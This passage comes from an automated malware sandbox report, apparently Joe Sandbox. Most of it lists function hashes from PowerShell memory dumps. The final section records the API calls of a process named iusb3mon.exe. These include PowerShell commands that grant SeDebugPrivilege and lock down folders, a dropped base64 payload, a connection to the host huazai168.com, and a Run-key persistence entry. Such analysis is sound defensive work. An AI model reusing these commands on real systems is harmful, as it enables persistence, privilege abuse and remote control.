Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c3c028965e244b1da7b1d3261dba95bd6f65cb61af13ff860e93c314571d153
Instruction ID: 759ec2e083d10a3d8ced658f218304617669b79c57210136827bf363796ff021
Opcode Fuzzy Hash: 8c3c028965e244b1da7b1d3261dba95bd6f65cb61af13ff860e93c314571d153
Instruction Fuzzy Hash: 46519E30A002189FDB14EFAAD884A9EBBF6FFC5314F148429D045EB254DB75AC46CB90

Function 04FB77E2 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd410e0803207a9daed7040755025b0cf841435dfb9b8d28a355d209c7f287d0
Instruction ID: 9886e38c7072e1baa6f043b94ee782fdbff8389206914fcfdc5b4c7b3de8219d
Opcode Fuzzy Hash: bd410e0803207a9daed7040755025b0cf841435dfb9b8d28a355d209c7f287d0
Instruction Fuzzy Hash: B9417F30A00218DFDB18DFA6C484A9EBBF6FFC5304F148529D446AB3A4DB75AC46CB80

Function 04FB82D0 Relevance: .1, Instructions: 109COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb57f015241751115e31b37765dd6738af4f025f7cfa0d03229da20f57f78585
Instruction ID: cbd22052bc27dc67feab98bc2c95697e67247dcc0f703ee5c68599e422915e4a
Opcode Fuzzy Hash: cb57f015241751115e31b37765dd6738af4f025f7cfa0d03229da20f57f78585
Instruction Fuzzy Hash: F231E431E04349DBDB08EFA6C4505EEBFB6EFC6340F14456AD045AB650DBB4A986CBD0

Function 04FB86B9 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a49c11105508a677cc6ec6da1f5c50d32aa3c76d9b54a0f249946475f0a7c9a6
Instruction ID: 6bf7f3b970e6189e1ea7fbb38ce3a57a147f2a41c80bf3ed97bde9bc54ec4ae7
Opcode Fuzzy Hash: a49c11105508a677cc6ec6da1f5c50d32aa3c76d9b54a0f249946475f0a7c9a6
Instruction Fuzzy Hash: FD41C870A011198FDB18DF69D990F99BBB5BF88204F1186E9D508AB395DA30EE85CF90

Function 04FB8854 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e797b87cee1d488c9d1decba8f6a20ede9c5dd1ce52676ca45c6d30d5997ca82
Instruction ID: a589dee96c052599e892abaa1171eaf852d7cd192651e1dfa93e268ca8cbcf07
Opcode Fuzzy Hash: e797b87cee1d488c9d1decba8f6a20ede9c5dd1ce52676ca45c6d30d5997ca82
Instruction Fuzzy Hash: 9A41DA34A011298FDB18DF69D990F9DB7B6FF88204F1086E5D408AB295DB34ED86CF91

Function 04FB7E38 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: beb1773ac14c0c2522659b9aa6c0e0d7ee36dc1162434ebabd45fdc5259dc3a5
Instruction ID: e17959be21a0761c32897c049d23c3067ba506f2e2900153dd9924f75b8260ce
Opcode Fuzzy Hash: beb1773ac14c0c2522659b9aa6c0e0d7ee36dc1162434ebabd45fdc5259dc3a5
Instruction Fuzzy Hash: 5E31A331A016148FDB14EF26C854AAEBBB6FFC9351F144028E502AB364DF75AC01CBA0

Function 04FB82C0 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 527c159e4e7bc9116afd8f969336a4806d715ce2a28a4d9278679e6c5a9f51c2
Instruction ID: 009fcec19340f3efc4b63f6a0e056154935af750a6bf2ea64548d942f1682638
Opcode Fuzzy Hash: 527c159e4e7bc9116afd8f969336a4806d715ce2a28a4d9278679e6c5a9f51c2
Instruction Fuzzy Hash: 36316D31E0070ACBDB18EFA6D5405DEBBB5FFC6340F14462AD445AB610EBB46986CBC0

Function 04FB76BA Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 141d9f659224d89ccfd5a2936d5608dde9d0c9388973e6bf7b0c09586fd7122b
Instruction ID: f62091fdf92e10f4fa3dcae65bff3700fa98bf56ee6ab7692e3973246533b380
Opcode Fuzzy Hash: 141d9f659224d89ccfd5a2936d5608dde9d0c9388973e6bf7b0c09586fd7122b
Instruction Fuzzy Hash: 67318F307006159FDB14DF2AD988B9E7BF2EF89711F184068E946EB3A1DB71AC41CB90

Function 04FB76C8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0da22c9e990d1ccc7306d1bd62a7521b9165ef7ac47613d9fde10caa174c0475
Instruction ID: 1a41e0443955b416fee97b11c903d7001c3c9a0401b04b9a6ad96e12bd848021
Opcode Fuzzy Hash: 0da22c9e990d1ccc7306d1bd62a7521b9165ef7ac47613d9fde10caa174c0475
Instruction Fuzzy Hash: 57217F31B005159FDB14EF6AD898B9E7BF6EF89711F140068E906EB3A0DB75AC41CB90

Function 04EBD005 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2441285779.0000000004EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4ebd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 044bbea39f8db3db4f4100175b121b853a005aa6fb97b251a349de2593dab2da
Instruction ID: 71f57c8e5beffac576576b1855d9dabb4f24c3b7df9894fe3eba1f8ddab6b061
Opcode Fuzzy Hash: 044bbea39f8db3db4f4100175b121b853a005aa6fb97b251a349de2593dab2da
Instruction Fuzzy Hash: FD01406110E7C09ED7128B259D94A92BFB4EF43224F1DC5DBD9888F193C2695845C7B2

Function 04EBD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2441285779.0000000004EBD000.00000040.00000800.00020000.00000000.sdmp, Offset: 04EBD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4ebd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c36e6b302867a9bd641a8dcb7a797b4711de9c200b723a49a83c6f1dd972ece8
Instruction ID: acbf8947318a34e17e8d486b6374f85f5b40da70c2b4250320913728762733f5
Opcode Fuzzy Hash: c36e6b302867a9bd641a8dcb7a797b4711de9c200b723a49a83c6f1dd972ece8
Instruction Fuzzy Hash: 11012B31105B00DAE7208E15DD84FE7BF9CEF45334F18C529ED884B246D279A841DAF1

Function 04FB8612 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e6ae81eae2f554dce136b1c0925d1236c60267f5bedc71d56dc4453cf102351
Instruction ID: f2e331a76727e9eef460a6aefaccca2aaefd266f9e32ead4835ebca1903c2d26
Opcode Fuzzy Hash: 3e6ae81eae2f554dce136b1c0925d1236c60267f5bedc71d56dc4453cf102351
Instruction Fuzzy Hash: 20012B305053809FC726CB29C4889AABFF4AF83298F0941DED4D59F262C334DD09CBA1

Function 04FB70A0 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 114ba63bdc57dddc5fc79ae1f561f43e73069237a22c7c5754956a117ac18a4f
Instruction ID: 3162a432ee5f5b1efa2eb1124bcb423e2f02f8d6d93d779d23bc5073a6b2ea85
Opcode Fuzzy Hash: 114ba63bdc57dddc5fc79ae1f561f43e73069237a22c7c5754956a117ac18a4f
Instruction Fuzzy Hash: 89011974E0424A8FCB44DF68C589AAABFF4FF49214F1041E9D509DB322E771A942DB91

Function 04FB2C06 Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 139220dcfb66f05977fb55a60bbe9b35a3a33b44fe586e973bc1e4a0d070eaf2
Instruction ID: 54430de337219186d40bd356f906718392d53ee185d6f906b351e7e7462adbfa
Opcode Fuzzy Hash: 139220dcfb66f05977fb55a60bbe9b35a3a33b44fe586e973bc1e4a0d070eaf2
Instruction Fuzzy Hash: EDF0B235A001099FCB15CB9DD994AEEF7B1FF88324F208199E555A72A1C732A852CB60

Function 04FB70B0 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1e9be9779a856b7962d1ca539a14513020983f7ff88bc95cab8081c5b5c4151b
Instruction ID: 09978809c11741b2a0446740e604f1902174d167d99810cfc3fee70954ea8a8b
Opcode Fuzzy Hash: 1e9be9779a856b7962d1ca539a14513020983f7ff88bc95cab8081c5b5c4151b
Instruction Fuzzy Hash: 6FF0A974E0420A8FC780DF68D485AAEBBF4FF49310F5041A9D509DB321E730A945CBD1

Function 04FB8270 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eeb9ea3de94c16766aa666890bc2dd161540124eebd3d2e0d6d5f125dec9ce1b
Instruction ID: 8afa4e1227a812917160ee49c0e313737d0d874ff4bc420d72cc4e55c104d92e
Opcode Fuzzy Hash: eeb9ea3de94c16766aa666890bc2dd161540124eebd3d2e0d6d5f125dec9ce1b
Instruction Fuzzy Hash: 70F0E5312447415FC305AB68E450ADA776AEFC1304B054566D146CB66ACF64B9998790

Function 04FB7BB0 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8930f1305e189874689587cdf197c29aeb120d7a98f7137c1f29a4068e963c4e
Instruction ID: 13aea4f0974433f6a9f9f55f0423864c6ba866cdfbf70abfa5dc4f65f5af0dd7
Opcode Fuzzy Hash: 8930f1305e189874689587cdf197c29aeb120d7a98f7137c1f29a4068e963c4e
Instruction Fuzzy Hash: 97D05E36B0135427470426BE7C9986FBACED6C9175315543AA50DC3301DD7A8C1141A1

Function 04FB7BE2 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01b28f7e2194467c0dc387a582d7118d0dfcc6d629e3fcb3f384330b56ab1da8
Instruction ID: ef55ccc2a7faccf0f65062a0123d635c3561ca537a2b6fff0d4231234ec8440c
Opcode Fuzzy Hash: 01b28f7e2194467c0dc387a582d7118d0dfcc6d629e3fcb3f384330b56ab1da8
Instruction Fuzzy Hash: 3EE04F342062D08FC346DB78E6588947FB1AF4A62871542EEE549CB373CA258C0487A2

Function 04FB7BF0 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000013.00000002.2442364399.0000000004FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_19_2_4fb0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c22d7b7540d54ce01d48e3979b1a33a6b068529f47db4941ce75483df20bfbdd
Instruction ID: 5ad54314a86ec33d5a70c239e579779c3af327bf42f4e3a9379a69650d2c241c
Opcode Fuzzy Hash: c22d7b7540d54ce01d48e3979b1a33a6b068529f47db4941ce75483df20bfbdd
Instruction Fuzzy Hash: 0BD05E352402149FC701AB68E448D957BAAEB4962470181A5E90987322CA25EC008BE1

Analysis Process: powershell.exePID: 4956, Parent PID: 4072COMMON

Executed Functions

Function 075900F0 Relevance: 14.3, Strings: 11, Instructions: 501COMMON

Download Yara Rule

Strings

4']q, xrefs: 075901D7
$]q, xrefs: 0759054C
4']q, xrefs: 07590366
$]q, xrefs: 075904ED
$]q, xrefs: 0759018B
$]q, xrefs: 075901B1
4']q, xrefs: 075901E3
4']q, xrefs: 07590372
$]q, xrefs: 075901BD
,esq, xrefs: 07590594
$]q, xrefs: 0759053C

Memory Dump Source

Source File: 00000015.00000002.2549236282.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7590000_powershell.jbxd

Similarity

API ID:
String ID: ,esq$4']q$4']q$4']q$4']q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-3150812542
Opcode ID: 9353626a159b45d920a660a5409d65596dc65c4266ae5178f46684c4e1053098
Instruction ID: 74352754783cf67978bc13a9e26efee6f1c76594fa5e9473809348f8f8a8cdfe
Opcode Fuzzy Hash: 9353626a159b45d920a660a5409d65596dc65c4266ae5178f46684c4e1053098
Instruction Fuzzy Hash: 21F1DFB1B0420BDFCF249F69D9406EABBE6BF85210F14887BD85D8B291DB31C946C791

Function 04AE2DF0 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2446402645.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_4ae0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 912a6f31b5b13527d546f077d7f4c27c0fdcf636c6024526115e715ad439aba5
Instruction ID: 2bd028f5980da62537e75459da80bf579b0d198639054e68f680baaacde46c8a
Opcode Fuzzy Hash: 912a6f31b5b13527d546f077d7f4c27c0fdcf636c6024526115e715ad439aba5
Instruction Fuzzy Hash: 7A91CD70A002459FCB05CF59C494ABEFBB1FF49310B24869AD865AB3A5C735FC90CBA0

Function 04AE7388 Relevance: .2, Instructions: 164COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2446402645.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_4ae0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 648d272105accf61993087f755c142630022ac7839eb970e1a6eb68ae5490360
Instruction ID: 70272d6e028c70a6a5c7a01de231a9030471a1b8bd7b8044ad4ce0820325eb04
Opcode Fuzzy Hash: 648d272105accf61993087f755c142630022ac7839eb970e1a6eb68ae5490360
Instruction Fuzzy Hash: 8C513734701264CFEB25AB79C855B6D77B2BF89248F1004A9D506DB3A0EF359D82CF61

Function 04AE2F02 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2446402645.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_4ae0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 97a936cc0dc0b319f735a50a48718100531b530de9c8ecfdc1e9528365b24c26
Instruction ID: 3dd1169d75908658c6c4e41ab503c284884a8f19b36e93c5b74855eca475d9eb
Opcode Fuzzy Hash: 97a936cc0dc0b319f735a50a48718100531b530de9c8ecfdc1e9528365b24c26
Instruction Fuzzy Hash: 95413874A005099FCB19CF5AC5D4ABAFBB1FF48310B158699D825AB365C732FC90CBA0

Function 04AE7273 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2446402645.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_4ae0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 877d075b4070427c327badce81b88181e8a8931fd6224102ac554e804d668d6f
Instruction ID: c40c7e08447794305eee09a4b7b714fb0df10ca7c30731a41b14857c0715f0fa
Opcode Fuzzy Hash: 877d075b4070427c327badce81b88181e8a8931fd6224102ac554e804d668d6f
Instruction Fuzzy Hash: 9931B834A0112A8FEB29DF29DD90F9DB7B1BF84204F1045E5D508AB2A5DB34EE85CF91

Function 04AE6F20 Relevance: .0, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2446402645.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_4ae0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8abcd9f9eceb2f5f3575f8059a89c9a1eb64abaa7424c347d0afb573df1ed889
Instruction ID: 7697161f6033691bb43216cb08ba737b2dadae9e4a89f29197b5a3c14b4c0ae0
Opcode Fuzzy Hash: 8abcd9f9eceb2f5f3575f8059a89c9a1eb64abaa7424c347d0afb573df1ed889
Instruction Fuzzy Hash: 3C115774A083868FC742DF68C4949697FB0AF0A304F5540EAD545DB363E231AD05CBA2

Function 045FD01D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2441934149.00000000045FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5fad17c95e2d648fd9520671e6a56122d2e38aac9c4840442aa995ca3983d084
Instruction ID: 627f70b507bd92b2e7364117c7053b013f820b217f74a5e1dcdae2afe9a2ae59
Opcode Fuzzy Hash: 5fad17c95e2d648fd9520671e6a56122d2e38aac9c4840442aa995ca3983d084
Instruction Fuzzy Hash: BE012031105340D9D7208E16ED84B67BFACFF45320F18C825EE4A0B146E279A449D6B6

Function 045FD006 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2441934149.00000000045FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 045FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_45fd000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04df77fe3f8e6f3254b4b6a0473ab224ceb161d7ebd46a96fd9f4843835d3d1e
Instruction ID: 259242bb415d4eb2f240e9ca402bd3f4e947c11e664a2e79f64fb68d9b50a9bd
Opcode Fuzzy Hash: 04df77fe3f8e6f3254b4b6a0473ab224ceb161d7ebd46a96fd9f4843835d3d1e
Instruction Fuzzy Hash: 6601527100E3C09ED7128B259C94756BFB8EF43224F1D84DBDD898F197C2695849D772

Function 04AE6F50 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2446402645.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_4ae0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 95ca50368b356eb2e1b29b72fbd51fec039eeed44e4aedd70381c9b1130966f1
Instruction ID: c19e9c32c391ff07e6740cffca180496fb39005b4ea52999a0989ec49f2755ad
Opcode Fuzzy Hash: 95ca50368b356eb2e1b29b72fbd51fec039eeed44e4aedd70381c9b1130966f1
Instruction Fuzzy Hash: 2AF0A974E0020A8FC780DF68D485AAEBBF5FF49314F5041A9E509DB321E730A945CBD1

Function 04AE718C Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000015.00000002.2446402645.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_4ae0000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d698f2e7401f464fae8143f595a1fe90834b5c54cee3572dfab9a1b4aab88049
Instruction ID: e194bbb6f752aef6cd9d92be7f0bd068d1bad1d05d62901327bae8a8c215457f
Opcode Fuzzy Hash: d698f2e7401f464fae8143f595a1fe90834b5c54cee3572dfab9a1b4aab88049
Instruction Fuzzy Hash: CBE0C2725012958FCB06CB55D4904FABFB4FE4216A71440EAE59527111C2309A1ADBB0

Non-executed Functions

Function 075907EF Relevance: 7.6, Strings: 6, Instructions: 79COMMON

Download Yara Rule

Strings

$]q, xrefs: 075908C6
4']q, xrefs: 07590853
$]q, xrefs: 075908BA
4']q, xrefs: 075908E7
4']q, xrefs: 075908DB
4']q, xrefs: 0759085F

Memory Dump Source

Source File: 00000015.00000002.2549236282.0000000007590000.00000040.00000800.00020000.00000000.sdmp, Offset: 07590000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_7590000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q$$]q$$]q
API String ID: 0-2669322367
Opcode ID: 32a0ae159a4897e91b52ac43766b778645baf237c6aab8cc40a6c55d962861e5
Instruction ID: 92c1fc6ad5b9f2090d01ee46771ab79e601ae2a465ccaa0a8e03bcc9ca63ad5c
Opcode Fuzzy Hash: 32a0ae159a4897e91b52ac43766b778645baf237c6aab8cc40a6c55d962861e5
Instruction Fuzzy Hash: B41108717082574FEB29116D28201F5EBE6EFC295072A0DB7C885D72D6CD254C4683D2

Analysis Process: iusb3mon.exePID: 3680, Parent PID: 1068COMMON

Execution Graph

Execution Coverage:	1.9%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	30.7%
Total number of Nodes:	498
Total number of Limit Nodes:	36

Executed Functions

Function 04D767CC Relevance: 131.7, APIs: 44, Strings: 31, Instructions: 466
filethreadnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadExecutionState.KERNEL32(80000003), ref: 04D767DD
DeleteFileA.KERNEL32(C:\del), ref: 04D767EE
DeleteFileA.KERNEL32(C:\tzfz), ref: 04D767F5
DeleteFileA.KERNEL32(C:\1.ini), ref: 04D767FC
DeleteFileA.KERNEL32(C:\2.ini), ref: 04D76803
DeleteFileA.KERNEL32(C:\inst.ini), ref: 04D7680A
DeleteFileA.KERNEL32(C:\odbc.ini), ref: 04D76811
DeleteFileA.KERNEL32(C:\odbc.inst.ini), ref: 04D76818
DeleteFileA.KERNEL32(C:\ProgramData\Microsoft\EdgeUpdate\Log\chuangkou.log), ref: 04D7681F

Part of subcall function 04D71C74: SetFileAttributesA.KERNEL32(00000000,00000080,04D7682E,C:\ProgramData\Microsoft\Program\ziliao.jpg,00000000), ref: 04D71C88

Part of subcall function 04D75CE6: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000001,00000000), ref: 04D75CF6
Part of subcall function 04D75CE6: Process32First.KERNEL32(00000000,?), ref: 04D75D0F
Part of subcall function 04D75CE6: Process32Next.KERNEL32(00000000,00000128), ref: 04D75D2A
Part of subcall function 04D75CE6: CloseHandle.KERNEL32(00000000,00000002,00000000,00000001,00000000), ref: 04D75D4F

WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"'),00000000), ref: 04D768AB
WinExec.KERNEL32(powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = *S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -P,00000000), ref: 04D768B3
WinExec.KERNEL32(powershell.exe -NoProfile -C "[IO.File]::WriteAllBytes([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege4.inf'), [Convert]::FromBase64String('//5bAFUAbgBpAGMAbwBkAGUAXQANAAoAVQBuAGkAYwBvAGQAZQA9AHkAZQBzAA0ACgBbAFYAZQByAHMAaQBvAG4AXQANAAoAcwBpAGcAbgBhAHQAdQByAGUA,00000000), ref: 04D768BB
CreateThread.KERNEL32(00000000,00000000,04D7628E,00000000,00000000,00000000), ref: 04D768D5
CreateThread.KERNEL32(00000000,00000000,04D75E1F,00000000,00000000,00000000), ref: 04D768E9
CreateThread.KERNEL32(00000000,00000000,04D75D5B,00000000,00000000,00000000), ref: 04D768FD
CreateThread.KERNEL32(00000000,00000000,04D76313,00000000,00000000,00000000), ref: 04D76911
CreateThread.KERNEL32(00000000,00000000,04D7650A,00000000,00000000,00000000), ref: 04D76925
CreateThread.KERNEL32(00000000,00000000,04D76780,00000000,00000000,00000000), ref: 04D76931
CreateThread.KERNEL32(00000000,00000000,04D71B6D,00000000,00000000,00000000), ref: 04D7693D
CreateThread.KERNEL32(00000000,00000000,04D76587,00000000,00000000,00000000), ref: 04D76949
WSAStartup.WS2_32(00000002,?), ref: 04D76A11
socket.WS2_32(00000002,00000001,00000000), ref: 04D76A1C
GetCurrentThreadId.KERNEL32 ref: 04D76A2B
htons.WS2_32(00006365), ref: 04D76A32
inet_addr.WS2_32(huazai168.com), ref: 04D76A3D
connect.WS2_32(?,00000002,00000010), ref: 04D76A4F
InternetOpenA.WININET(Mozilla/4.0 (compatible),00000000,00000000,00000000,00000000), ref: 04D76A9F
InternetOpenUrlA.WININET(?,?,00000000,00000000,80000100,00000000), ref: 04D76AD7
InternetReadFile.WININET(?,?,00000824,?), ref: 04D76AF3
InternetCloseHandle.WININET(?), ref: 04D76B3C
InternetCloseHandle.WININET(?), ref: 04D76B45
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 04D76B7A
GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 04D76BF4
CopyFileA.KERNEL32(?,?,00000000), ref: 04D76C06
RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,000F003F,?), ref: 04D76C20
RegSetValueExA.ADVAPI32(?,04DA2BD8,00000000,00000001,?,00000018), ref: 04D76C3B
RegCloseKey.ADVAPI32(?), ref: 04D76C44
Sleep.KERNEL32(0000003C), ref: 04D76C51
ExitProcess.KERNEL32 ref: 04D76C5A
StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 04D76C8E
Sleep.KERNEL32(0000003C), ref: 04D76CAD
GetModuleFileNameA.KERNEL32(00000000,?,000000E1), ref: 04D76D1D
